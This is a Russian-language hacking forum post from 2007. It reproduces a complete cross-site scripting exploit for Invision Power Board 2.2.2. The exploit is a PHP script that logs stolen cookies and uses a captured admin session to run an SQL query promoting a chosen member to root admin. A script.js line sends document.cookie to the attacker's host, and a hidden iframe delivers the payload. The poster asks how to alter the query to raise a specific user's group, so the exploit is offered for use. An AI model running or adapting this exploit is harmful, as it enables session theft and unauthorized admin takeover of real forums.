Форум АНТИЧАТ - Вопрос ламмера по сплойту Ipb222

Вопрос ламмера по сплойту Ipb222

14.08.2007, 00:14

FaR-G9

Участник форума

Регистрация: 19.12.2006

Сообщений: 159

Провел на форуме:
896935

Репутация: 64

Отправить сообщение для FaR-G9 с помощью ICQ

Вопрос ламмера по сплойту Ipb222

Invision Power Board 2.2.2 Cross Site Scripting vulnerability

Код:

 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# 
#   Invision Power Board 2.2.2 Cross Site Scripting vulnerability 
# 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   Vendor site: http://www.invisionboard.com/ 
#   Vulnerability found by Iron (ironwarez.info) 
# 
#   Greets to all **** Security Group members     
# 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   The vulnerability: 
#   Open up any php file in /jscripts/folder_rte_files 
#    See: 

    var editor_id         = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?> 
     
# 
#   $_REQUEST['editorid'] isn't sanitized in any way, so allows 
#   other uses to execute their own code. 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   PoC (Log cookies & run SQL query) 
# 
#   Requirements: server supporting PHP, user account on 
#   target forum, database prefix needs to be known. 
# 
#   Create a file called name.php on your webserver and put this code in it: 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<?php 
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash 
$prefix = "ibf_"; #Database prefix, default: ibf_ 
$member = 22; #Member id to promote 
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin 

$ip = $_SERVER['REMOTE_ADDR']; 
$referer = $_SERVER['HTTP_REFERER']; 
$agent = $_SERVER['HTTP_USER_AGENT']; 

$data = $_GET['c']; 
$time = date("Y-m-d G:i:s A"); 
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n"; 

$file = fopen('log.txt' , 'a'); 
fwrite($file,$text); 
fclose($file); 
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff)) 
{ 
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql&section=admin&query=UPDATE+ 
'.$prefix.'members+SET 
+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.  $member.'%27&st="></>'; 
} 
?> 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#    Also create a file in the same directory named "log.txt" and chmod it 777 
# 
#    Now, create a file called script.js on your webserver, put this code in it: 
# 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie; 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# 
#    And, last but not least, create a file that combines those two;) 
#    Name it blah.html and put this code in it: 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></ 
script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

Насколько я понял, этим сплойтом можно выполнять скуль команды, при просмотре страницы жертвой.

Так-вот я хотел-бы узнать как тут изменить скуль команду, чтоб изменить группу юзера(id=1483) с 3 на 4.
Спасибо